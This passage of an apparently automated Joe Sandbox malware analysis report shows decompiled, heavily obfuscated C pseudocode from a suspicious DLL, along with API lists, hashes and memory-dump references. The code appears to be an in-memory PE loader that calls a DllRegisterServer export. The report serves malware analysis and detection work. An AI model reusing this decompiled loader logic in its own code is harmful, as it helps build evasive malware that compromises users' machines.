							_t951 = (_t795 - _t691 + 1) * _t795 + (_t795 - _t691 + 1) * _t795 * 4 - (_t691 + _t691 * 4 + 5) * _t1128 - _t691 + _t691 * 4 + ( *(_t1248 + 0x5c))[0x1e] +  *(_t1248 + 0x5c);
							_t47 = _t340 + 0x7fffffff; // 0x7fffffff
							 *(_t1248 + 0x18) = _t340 + _t340;
							_t52 = _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + 0x4550; // 0x4550
							_t1132 =  *0x1004b0e8; // 0x0
							_t563 =  *0x1004b0d8; // 0x0
							 *((intOrPtr*)(_t1248 + 0x24)) = _t951;
							if( *_t951 != _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + _t52 - ( *(_t1248 + 0x18) + 2 + _t1132 * 2) * _t563) {
								goto L32;
							} else {
								_t1135 =  *0x1004b0e0; // 0x0
								_t1138 =  *0x1004b0e0; // 0x0
								if(( *(_t951 + 4) & 0x0000ffff) != ((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138 + 0x14c + (((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138) * 2) {
									goto L32;
								} else {
									 *(_t1248 + 0x1c) =  *(_t951 + 0x38);
									_t1035 =  *0x1004b0e0; // 0x0
									 *(_t1248 + 0x20) = _t563 + _t563 * 2;
									if(( *(_t1248 + 0x1c) &  *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691 + 0x00000001 + ( *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691) * 0x00000002) != 0) {
										goto L32;
									} else {
										_t1041 =  *0x1004b0e0; // 0x0
										_t1042 =  *0x1004b0e8; // 0x0
										_t1043 =  *0x1004b0e8; // 0x0
										_t571 =  *0x1004b0d8; // 0x0
										_t1153 =  *0x1004b0e0; // 0x0
										 *(_t1248 + 0x20) = ((_t563 * _t563 + _t1041) * _t563 + (_t563 - _t340 - _t691) * _t795 + (2 - _t1042 -  *0x1004b0d8) * _t1043 + (_t571 + _t795) * 2 - _t340 + _t691) * 0x78 + _t951 + ( *(_t951 + 0x14) & 0x0000ffff) + 0x18;
										_t579 =  *(_t1248 + 0x18);
										_t83 = _t795 - 2; // -2
										_t1049 = (_t795 + _t83 - _t579) * _t340 + ((_t1153 * _t795 + 1) * _t691 + 0x7fffffff) * _t1043 * 2 + ( *(_t951 + 6) & 0x0000ffff) - _t691 + _t691;
										if(_t1049 == 0) {
											_t580 =  *0x1004b0d8; // 0x0
											_t1050 =  *0x1004b0e8; // 0x0
										} else {
											 *((intOrPtr*)(_t1248 + 0x28)) =  ~_t579 - _t691 * 4;
											 *(_t1248 + 0x10) =  *(_t1248 + 0x20) + 0xc;
											_t673 =  *0x1004b0d8; // 0x0
											 *(_t1248 + 0x20) = _t1049;
											_t1086 =  *0x1004b0e8; // 0x0
											do {
												_t1237 =  *( *(_t1248 + 0x10) + 4);
												 *(_t1248 + 0x18) = _t1237;
												if(_t1237 != 0) {
													_t951 =  *((intOrPtr*)(_t1248 + 0x24));
													_t1091 = (4 + _t340 * 4) * _t673 + (_t1086 * 8 - 0xc) * _t795 +  *(_t1248 + 0x18) + (_t691 + _t691 * 2 + (_t691 + _t1086 * 2 + _t673 + 1) *  *0x1004b0e0 + _t1086) * 4 +  *( *(_t1248 + 0x10));
												} else {
													_t97 = _t795 + 0x7ffffffe; // 0x7ffffffe
													_t1094 =  *0x1004b0e0; // 0x0
													_t1091 =  *(_t1248 + 0x1c) + (((_t340 + _t691) * _t1086 + _t691) * 0x7fffffff + _t97 * _t795 + _t1094 * 2) * 2 +  *( *(_t1248 + 0x10));
												}
												 *(_t1248 + 0x18) = _t1091;
												if(_t1091 <=  *((intOrPtr*)(_t1248 + 0x28)) +  *(_t1248 + 0x14)) {
													_t673 =  *0x1004b0d8; // 0x0
												} else {
													_t1097 =  *0x1004b0e0; // 0x0
													_t673 =  *0x1004b0d8; // 0x0
													 *(_t1248 + 0x14) =  *(_t1248 + 0x18) + ((_t340 + _t795) * 0x3fffffff + ((_t340 *  *0x1004b0d8 + 1) * 0x3fffffff + _t1097) *  *0x1004b0e8 + _t1097 + _t691 + _t673) * 4;
												}
												_t1086 =  *0x1004b0e8; // 0x0
												 *(_t1248 + 0x10) =  *(_t1248 + 0x10) + 0x28;
												_t129 = _t1248 + 0x20;
												 *_t129 =  *(_t1248 + 0x20) - 1;
											} while ( *_t129 != 0);
										}
										_t133 =  *(_t1248 + 0x2c) * _t580 + 2; // 0x2
										 *0x1004d3bc(_t1248 + 0x34 + ((_t340 - _t691 - 4) * _t795 - (_t340 + _t133) * _t1050 + ( *(_t1248 + 0x30) + _t580 + 2) *  *0x1004b0e0 - _t691) * 0x6c);
										_t351 =  *0x1004b0e4; // 0x0
										_t692 =  *0x1004b0ec; // 0x0
										_t1165 =  *0x1004b0e8; // 0x0
										_t1051 =  *0x1004b0dc; // 0x0
										_t583 =  *0x1004b0e0; // 0x0
										 *(_t1248 + 0x34) = E10002BF0((2 - _t351 * _t351) * _t583 - _t692 + _t692 - _t1165 + _t1051 +  *((intOrPtr*)(_t1248 + 0x38)), (1 - _t1165) * _t351 * _t1051 +  *((intOrPtr*)(_t951 + 0x50)));
										_t354 =  *0x1004b0d8; // 0x0
										_t142 = _t354 + 0x7ffffffe; // 0x7ffffffe
										_t143 = _t354 + 2; // 0x2
										_t356 =  *0x1004b0e4; // 0x0
										_t360 =  *0x1004b0ec; // 0x0
										_t146 = _t1051 + 0xa; // 0xa
										_t706 =  *0x1004b0d8; // 0x0
										 *(_t1248 + 0x1c) =  *(_t1248 + 0x34) + (_t356 * 0x7fffffff + _t142 * _t1165 + _t1051 + _t1051 + _t143 * _t583 << 1) - (_t1051 + _t146) * _t360;
										_t707 = _t706 * _t1051;
										 *(_t1248 + 0x14) = _t707;
										_t1166 =  *0x1004b0ec; // 0x0
										 *(_t1248 + 0x34) = (_t707 * 0xfffffffd - (_t1165 * _t1165 + 3 + _t1165 * _t1165 * 2) * _t583 + 3) * _t583;
										_t1167 =  *0x1004b0d8; // 0x0
										_t373 = E10002BF0( *((intOrPtr*)(_t1248 + 0x3c)) + _t360, ( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167 + (( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167) * 2 +  *(_t1248 + 0x34) +  *(_t1248 + 0x18));
										_t1249 = _t1248 + 8;
										if( *(_t1248 + 0x20) != _t373) {
											goto L32;
										} else {
											_t716 =  *0x1004b0ec; // 0x0
											 *(_t1249 + 0x20) = _t716 * _t1167;
											_t165 = _t1051 + 2; // 0x3
											_t717 =  *0x1004b0e8; // 0x0
											_t166 = _t1167 + 1; // 0x1
											_t385 =  *0x1004b0e4; // 0x0
											_t388 =  *0x1004b0ec; // 0x0
											_t398 =  *0x1004b0e4; // 0x0
											_t403 =  *0x1004b0ec; // 0x0
											_t722 =  *0x1004b0e8; // 0x0
											_t182 = _t403 + 1; // 0x1
											_t1168 =  *((intOrPtr*)(_t1249 + 0x74));
											_t405 =  *_t1168((( ~_t1051 << 1) - ( *((intOrPtr*)(_t1249 + 0x30)) + 2) *  *0x1004b0e4 + _t583 << 2) - (_t403 + _t403 + _t403 * 2 + _t182 * _t722 * _t722 * 4) * _t1167 +  *((intOrPtr*)(_t951 + 0x34)),  *(_t1249 + 0x20), ((_t388 * _t388 * _t1167 + _t388 * _t388 * _t1167 * 0x00000002 - _t1051 + _t1051 * 0x00000002) * _t583 - _t1051 + _t1051 * 0x00000002) * _t1051 + (_t583 * _t1167 + _t583 * _t1167 * 0x00000002 - 0x00000003) * _t717 -  *(_t1249 + 0x28) +  *(_t1249 + 0x28) * 0x00000002 + 0x00001000 | (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + 0x00002000, ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + 4,  *((intOrPtr*)(_t1249 + 0x78)));
											_t1250 = _t1249 + 0x14;
											_t585 = _t405;
											 *((intOrPtr*)(_t1250 + 0x10)) = _t585;
											if(_t585 != 0) {
												L21:
												_t836 =  *0x1004b0e8; // 0x0
												_t726 =  *0x1004b0ec; // 0x0
												_t213 = (_t836 -  *0x1004b0dc + 1) * _t836 + _t726 + 0x40; // 0x41
												_t840 =  *0x1004b0d8; // 0x0
												_t1064 =  *0x1004b0e4; // 0x0
												_t841 =  *0x1004b0e8; // 0x0
												_t410 = HeapAlloc(GetProcessHeap(), 8 + ((_t841 + 1) *  *0x1004b0dc + (_t726 * 0x3fffffff + _t840) *  *0x1004b0e0 + _t726 * 0x3fffffff + _t1064) * 4, (1 - _t726) *  *0x1004b0e0 + _t213);
												_t731 =  *0x1004b0e8; // 0x0
												_t411 =  *0x1004b0e0; // 0x0
												_t412 =  *0x1004b0ec; // 0x0
												_t1066 = _t410 + (_t731 - _t411 - _t412 +  *0x1004b0dc << 6);
												if(_t1066 != 0) {
													 *((intOrPtr*)(_t1066 + 4)) = _t585;
													_t413 =  *0x1004b0e0; // 0x0
													_t732 =  *0x1004b0ec; // 0x0
													_t224 = _t732 * 2; // -268738780
													_t853 =  *0x1004b0e8; // 0x0
													_t733 =  *0x1004b0d8; // 0x0
													 *((intOrPtr*)(_t1066 + 0x20)) =  *((intOrPtr*)(_t1250 + 0x68));
													asm("sbb eax, eax");
													 *((intOrPtr*)(_t1066 + 0x2c)) =  *((intOrPtr*)(_t1250 + 0x74));
													 *(_t1066 + 0x14) =  ~( ~((_t413 + _t732) * _t413 + _t224 + 0x00001000 - _t853 + _t733 << 0x00000001 &  *(_t951 + 0x16) & 0x0000ffff));
													 *((intOrPtr*)(_t1066 + 0x24)) =  *((intOrPtr*)(_t1250 + 0x6c));
													 *((intOrPtr*)(_t1066 + 0x34)) =  *((intOrPtr*)(_t1250 + 0x78));
													 *((intOrPtr*)(_t1066 + 0x28)) =  *((intOrPtr*)(_t1250 + 0x70));
													 *((intOrPtr*)(_t1066 + 0x1c)) = _t1168;
													_t423 =  *0x1004b0e8; // 0x0
													_t736 =  *0x1004b0e4; // 0x0
													 *((intOrPtr*)(_t1066 + 0x3c)) = ((3 - _t423 + _t423 * 2) *  *0x1004b0ec - 6) *  *0x1004b0e0 + _t736 + _t736 * 2 - _t423 + _t423 * 2 +  *((intOrPtr*)(_t1250 + 0x38));
													_t1169 =  *0x1004b0ec; // 0x0
													_t425 =  *0x1004b0e4; // 0x0
													_t738 =  *0x1004b0e0; // 0x0
													_t587 =  *0x1004b0d8; // 0x0
													_t739 =  *0x1004b0e8; // 0x0
													 *((intOrPtr*)(_t1250 + 0x2c)) =  *((intOrPtr*)(_t951 + 0x54));
													_t867 =  *0x1004b0e0; // 0x0
													_t433 = E10002C60((_t739 + _t739 * 2 - 3) * _t1169 +  *((intOrPtr*)(_t1250 + 0x64)) + _t587 * _t587 - _t867 + (_t587 * _t587 - _t867) * 2,  *((intOrPtr*)(_t951 + 0x54)) + (_t425 * _t1169 + _t738 + _t739 + _t587) * 2 + _t425 * _t1169 + _t738 + _t739 + _t587);
													_t1251 = _t1250 + 8;
													if(_t433 == 0) {
														L31:
														_push(_t1066);
														E10004DD0();
														goto L32;
													} else {
														_t743 =  *0x1004b0e0; // 0x0
														_t436 =  *0x1004b0e8; // 0x0
														_t437 =  *0x1004b0dc; // 0x0
														_t752 =  *0x1004b0e0; // 0x0
														_t1170 =  *0x1004b0e4; // 0x0
														_t438 =  *0x1004b0e8; // 0x0
														_t441 =  *((intOrPtr*)(_t1251 + 0x78))( *((intOrPtr*)(_t1251 + 0x1c)),  *(_t1251 + 0x34) + (_t587 * 0x7fffffff + _t752) * 2, 0x1000 + ((_t1170 + _t437) * 0x3fffffff + (_t1169 * 0x3fffffff + _t437 + 2) * _t1169 + _t438) * 4, 4 + (((_t436 + _t1169 + _t437) * 0x3fffffff + _t587 + 2) * _t437 + _t1169 + (3 - _t743 *  *0x1004b0e4) * _t436 + _t752 * 2) * 4,  *((intOrPtr*)(_t1251 + 0x78)));
														_t754 =  *0x1004b0dc; // 0x0
														_t590 =  *0x1004b0d8; // 0x0
														_t1174 =  *0x1004b0d8; // 0x0
														 *(_t1251 + 0x34) = _t441;
														_t442 =  *0x1004b0e8; // 0x0
														_t888 =  *0x1004b0e4; // 0x0
														_t444 =  *0x1004b0ec; // 0x0
														memcpy( *(_t1251 + 0x34),  *(_t1251 + 0x70), ((2 - _t442) *  *0x1004b0e4 + _t1174 + 2) *  *0x1004b0e0 - (_t754 * _t754 + _t442 + _t590) *  *0x1004b0ec - _t888 * _t442 - _t442 * _t754 - _t444 - _t444 - _t754 - _t754 +  *((intOrPtr*)(_t951 + 0x54)));
														_t604 =  *0x1004b0d8; // 0x0
														_t756 =  *0x1004b0dc; // 0x0
														_t448 =  *0x1004b0e0; // 0x0
														_t890 =  *0x1004b0ec; // 0x0
														_t891 =  *0x1004b0d8; // 0x0
														_t279 = _t448 + 0x2e9; // 0x2e9
														_t453 =  *((intOrPtr*)(_t1251 + 0x40)) +  *((intOrPtr*)( *((intOrPtr*)(_t1251 + 0x7c)) + 0x3c)) + (((_t448 + _t890) * _t890 + (_t604 - _t756 + 1) *  *0x1004b0e4 + _t448 + _t891) * 0xf8 + (_t448 * _t891 - 0xfa) *  *0x1004b0e8 - _t279 *  *0x1004b0e4 + (_t448 + 0xfffffffe) *  *0x1004b0ec + _t756 * 0x2e5) * 2;
														 *_t1066 = _t453;
														_t759 =  *0x1004b0e4; // 0x0
														_t1184 =  *0x1004b0e0; // 0x0
														_t895 =  *0x1004b0e8; // 0x0
														_t1187 =  *0x1004b0ec; // 0x0
														 *((intOrPtr*)(_t453 + 0x34)) = (2 - _t759 + _t759) *  *0x1004b0e0 +  *((intOrPtr*)(_t1251 + 0x30)) + (_t759 * 0x7ffffffd + ((_t759 *  *0x1004b0ec + _t895 + 1) * 0x7fffffff + _t1184 *  *0x1004b0d8 *  *0x1004b0dc) * _t895 + _t1187) * 2;
														_t900 =  *0x1004b0e8; // 0x0
														_t454 =  *0x1004b0e4; // 0x0
														_t761 =  *0x1004b0ec; // 0x0
														_t624 =  *0x1004b0d8; // 0x0
														_t293 = _t624 + 1; // 0x1
														_t463 =  *0x1004b0e0; // 0x0
														_push((0xc0 - (_t454 * _t900 * _t761 + _t454 * _t900 * _t761 * 2 << 6)) * _t900 - (_t293 * _t761 + _t293 * _t761 * 2 << 6) + _t1066);
														_push(_t951);
														_push((0xfffffffc -  *0x1004b0e4) *  *0x1004b0dc - (_t463 + 1) * _t900 * _t761 - _t761 * _t624 - _t900 +  *((intOrPtr*)(_t1251 + 0x88)));
														_push( *((intOrPtr*)(_t1251 + 0x84)));
														_t467 = E10002CA0();
														_t1251 = _t1251 + 0x30;
														if(_t467 == 0) {
															goto L31;
														} else {
															_t468 =  *0x1004b0e8; // 0x0
															_t765 =  *0x1004b0d8; // 0x0
															_t1200 =  *0x1004b0dc; // 0x0
															_t903 =  *0x1004b0e4; // 0x0
															_t905 =  *0x1004b0ec; // 0x0
															_t1202 = _t765 - _t905 + _t905;
															_t907 =  *0x1004b0dc; // 0x0
															_t299 = _t1202 - 2; // -2
															_t636 = (_t765 + _t299) * _t907 + (((_t468 * _t765 - _t1200) * _t765 - 2) *  *0x1004b0e0 + _t468 * _t468 - _t903 + _t903 - _t905) * 2 +  *((intOrPtr*)( *_t1066 + 0x34)) -  *((intOrPtr*)(_t951 + 0x34));
															 *((intOrPtr*)(_t1251 + 0x60)) = _t636;
															if(_t636 == 0) {
																 *((intOrPtr*)(_t1066 + 0x18)) = 1;
															} else {
																_t963 =  *0x1004b0e0; // 0x0
																_t1227 =  *0x1004b0e4; // 0x0
																_push( *((intOrPtr*)(_t1251 + 0x60)) + ((_t963 - _t1227 +  *0x1004b0ec << 1) - (_t468 *  *0x1004b0ec * _t907 * _t907 * _t907 + _t963 * _t468) * _t468 + _t907) * 4);
																_t970 =  *0x1004b0e0; // 0x0
																_t971 =  *0x1004b0e4; // 0x0
																_push((((_t970 * _t970 << 1) - _t971 + _t468 + _t468 - 2) * _t907 - (_t907 + 4 + _t765 * 2) * _t971 + (_t765 - _t468 + _t468) * 2 << 6) + _t1066);
																_t492 = E10003B80();
																_t924 =  *0x1004b0e0; // 0x0
																_t1251 = _t1251 + 8;
																 *((intOrPtr*)(_t1066 + 0x18)) = _t492 - (_t924 *  *0x1004b0d8 << 2);
															}
															_t469 =  *0x1004b0e4; // 0x0
															_t766 =  *0x1004b0e0; // 0x0
															_push((_t766 - _t469 *  *0x1004b0e8 *  *0x1004b0ec *  *0x1004b0dc << 8) + _t1066);
															_t473 = E10003F40();
															_t1251 = _t1251 + 4;
															if(_t473 == 0) {
																goto L31;
															} else {
																_t474 =  *0x1004b0e8; // 0x0
																_t770 =  *0x1004b0dc; // 0x0
																_t637 =  *0x1004b0e4; // 0x0
																_t318 = _t474 * 2; // 0x1
																_t954 =  *0x1004b0ec; // 0x0
																_push(((1 - _t474 - _t770) *  *0x1004b0d8 + (_t770 + _t318 + 1) *  *0x1004b0e0 + _t770 * 2 - _t637 - _t954 + _t474 << 8) + _t1066);
																_t475 = E10003570();
																_t1251 = _t1251 + 4;
																if(_t475 == 0) {
																	goto L31;
																} else {
																	_t913 =  *0x1004b0e0; // 0x0
																	_push((_t913 *  *0x1004b0d8 *  *0x1004b0dc << 7) + _t1066);
																	_t476 = E10003AD0();
																	_t1251 = _t1251 + 4;
																	if(_t476 != 0) {
																		_t478 =  *((intOrPtr*)( *_t1066 + 0x28));
																		 *((intOrPtr*)(_t1251 + 0x60)) = _t478;
																		if(_t478 == 0) {
																			 *(_t1066 + 0x38) = 0;
																			return _t1066;
																		} else {
																			if( *(_t1066 + 0x14) == 0) {
																				_t481 =  *0x1004b0d8; // 0x0
																				_t955 =  *0x1004b0e0; // 0x0
																				_t918 =  *0x1004b0ec; // 0x0
																				_t778 =  *0x1004b0e8; // 0x0
																				_t331 = _t955 * _t778 - _t918 + 1; // 0x1
																				 *(_t1066 + 0x38) = (_t778 * _t778 * _t481 * 4 - 4) * _t955 + (4 - _t481 * 4) * _t918 +  *((intOrPtr*)(_t1251 + 0x60)) + (_t481 + _t331) *  *0x1004b0dc * 4 +  *((intOrPtr*)(_t1251 + 0x10));
																				return _t1066;
																			} else {
																				_t780 =  *0x1004b0ec; // 0x0
																				_t921 =  *0x1004b0d8; // 0x0
																				_t956 =  *0x1004b0e4; // 0x0
																				_t642 =  *0x1004b0dc; // 0x0
																				_t962 =  *0x1004b0e0; // 0x0
																				 *0x1004d404 = (_t780 * _t921 - (_t956 + _t642) * _t956 - 3) *  *0x1004b0e8 - _t921 * _t642 + _t962 * _t962 - _t780 - _t780 +  *((intOrPtr*)(_t1251 + 0x60)) + _t780 * _t921 + _t921 +  *((intOrPtr*)(_t1251 + 0x10));
																				 *((intOrPtr*)(_t1066 + 0x10)) = 1;
																				return _t1066;
																			}
																		}
																	} else {
																		goto L31;
																	}
																}
															}
														}
													}
												} else {
													_t1067 =  *0x1004b0d8; // 0x0
													_t928 =  *0x1004b0dc; // 0x0
													_t219 = ((_t1067 * _t928 - 1) * _t731 - 1) *  *0x1004b0e4 + _t412 + 0x8000; // 0x7fff
													 *((intOrPtr*)(_t1250 + 0x78))(_t585, 0, (_t412 * _t928 - 1) *  *0x1004b0e0 + _t219,  *((intOrPtr*)(_t1250 + 0x78)));
													return 0;
												}
											} else {
												_t789 =  *0x1004b0e4; // 0x0
												_t930 =  *0x1004b0dc; // 0x0
												_t1075 =  *0x1004b0d8; // 0x0
												_t1076 =  *0x1004b0ec; // 0x0
												_t194 = _t1076 - 4; // -4
												_t665 =  *0x1004b0e8; // 0x0
												_t498 =  *0x1004b0e0; // 0x0
												_t1084 =  *0x1004b0d8; // 0x0
												_t198 = (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084) * 2; // -3
												_t200 = _t1084 + 2; // 0x2
												_t1085 =  *0x1004b0ec; // 0x0
												_t668 =  *0x1004b0d8; // 0x0
												_t207 = (1 - _t668) * _t789 + _t1085 + _t930 + 0x1000; // 0x1001
												_t520 =  *0x1004b0e0; // 0x0
												_t1168 =  *((intOrPtr*)(_t1250 + 0x70));
												_t523 =  *_t1168(0,  *((intOrPtr*)(_t1250 + 0x20)) + _t520 *  *0x1004b0e8 * 2, (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084 + _t198 - 0x00000003) * _t789 - _t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002 + (_t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002) * 0x00000002 + 0x00002000 | (0x00000001 - _t668) * _t789 + _t1085 + _t930 + _t207, (1 - _t930) * _t665 + (1 - _t789 * _t930) * _t789 + _t498 + (_t1075 * _t1075 - _t789 * _t930 + _t194) * _t1076 + 4,  *((intOrPtr*)(_t1250 + 0x78)));
												_t1250 = _t1250 + 0x14;
												 *((intOrPtr*)(_t1250 + 0x10)) = _t523;
												if(_t523 == 0) {
													goto L32;
												} else {
													_t585 = _t523;
													goto L21;
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 100056FB
GetProcessHeap.KERNEL32(00000000,00000041), ref: 10005A6B
HeapAlloc.KERNEL32(00000000), ref: 10005A72
memcpy.MSVCRT ref: 10005CEC

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Heap$AllocInfoNativeProcessSystemmemcpy
String ID:
API String ID: 1755227880-0
Opcode ID: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
Instruction ID: 53ea61cdfd61ec98e79d57da9c3d37a8995a084b4a0616e836109eb4d92bec45
Opcode Fuzzy Hash: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
Instruction Fuzzy Hash: 5A92D7326407298FD318DF6CCEC2546B7A9F789311B05863AD925DB3B5E670F909CB88

Uniqueness

Uniqueness Score: -1.00%

Function 100350EA Relevance: 4.6, APIs: 3, Instructions: 60
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E100350EA(intOrPtr __ecx, void* __eflags) {
				void* _t37;
				intOrPtr _t54;
				void* _t56;

				E10011BF0(0x1003a421, _t56);
				_push(__ecx);
				_t54 = __ecx;
				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
				E10035766(__ecx, __eflags); // executed
				 *((intOrPtr*)(_t56 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x1003d6fc;
				if( *((intOrPtr*)(_t56 + 8)) == 0) {
					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				} else {
					 *((intOrPtr*)(_t54 + 0x4c)) = E10011F76( *((intOrPtr*)(_t56 + 8)));
				}
				_t37 = E100373B5();
				_t44 = _t37;
				_push(0x10035062);
				_t7 = _t44 + 0x1070; // 0x1070
				 *((intOrPtr*)(E10037855(_t7) + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x28)) = GetCurrentThread();
				 *((intOrPtr*)(_t54 + 0x2c)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t37 + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x40)) = 0;
				 *((intOrPtr*)(_t54 + 0x78)) = 0;
				 *((intOrPtr*)(_t54 + 0x60)) = 0;
				 *((intOrPtr*)(_t54 + 0x64)) = 0;
				 *((intOrPtr*)(_t54 + 0x50)) = 0;
				 *((intOrPtr*)(_t54 + 0x5c)) = 0;
				 *((intOrPtr*)(_t54 + 0x84)) = 0;
				 *((intOrPtr*)(_t54 + 0x54)) = 0;
				 *((short*)(_t54 + 0x8e)) = 0;
				 *((short*)(_t54 + 0x8c)) = 0;
				 *((intOrPtr*)(_t54 + 0x44)) = 0;
				 *((intOrPtr*)(_t54 + 0x88)) = 0;
				 *((intOrPtr*)(_t54 + 0x7c)) = 0;
				 *((intOrPtr*)(_t54 + 0x80)) = 0;
				 *((intOrPtr*)(_t54 + 0x6c)) = 0;
				 *((intOrPtr*)(_t54 + 0x70)) = 0;
				 *((intOrPtr*)(_t54 + 0x90)) = 0;
				 *((intOrPtr*)(_t54 + 0x98)) = 0;
				 *((intOrPtr*)(_t54 + 0x58)) = 0;
				 *((intOrPtr*)(_t54 + 0x68)) = 0;
				 *((intOrPtr*)(_t54 + 0x94)) = 0x200;
				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
				return _t54;
			}

APIs

__EH_prolog.LIBCMT ref: 100350EF

Part of subcall function 10035766: __EH_prolog.LIBCMT ref: 1003576B

GetCurrentThread.KERNEL32 ref: 1003513D
GetCurrentThreadId.KERNEL32 ref: 10035146

Part of subcall function 10011F76: _strlen.LIBCMT ref: 10011F80

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentH_prologThread$_strlen
String ID:
API String ID: 1650857145-0
Opcode ID: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
Instruction ID: 61552a51ecdf068f7bb4f9f9d17d647312d48b00674ee0c1313581d8a4369c28
Opcode Fuzzy Hash: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
Instruction Fuzzy Hash: 44218CB0800B509FD321CF6AD44569AFBF8FFA4641F10891FE5AA8BB21CBB5A541CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10005090 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E10005090() {
				int _t1;

				_t1 =  *0x1004d408; // 0x2acfbb8
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				_push("DllRegisterServer");
				_push(_t1);
				 *((intOrPtr*)(E10004780()))(); // executed
				return 0;
			}

0x10005090
0x10005097
0x1000509a
0x1000509a
0x100050a0
0x100050a5
0x100050ae
0x100050b2

APIs

ExitProcess.KERNEL32 ref: 1000509A

Strings

DllRegisterServer, xrefs: 100050A0

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
Instruction ID: 3990abb4a36e91ec48151b626d133cf46f0332b691c0db4f0bfff747b4acf562
Opcode Fuzzy Hash: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
Instruction Fuzzy Hash: 5BC08CB1A002191BE601EBF29C8CE0B329C8B801877020414F100D2005EF30E10002A9

Uniqueness

Uniqueness Score: -1.00%

Function 1001382A Relevance: 3.1, APIs: 2, Instructions: 59
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E1001382A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				long _t23;
				long _t31;
				void* _t33;
				void* _t34;
				void* _t40;

				_push(0x10);
				_push(0x10041e40);
				E10012514(__ebx, __edi, __esi);
				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
				 *(_t33 - 0x20) = _t31;
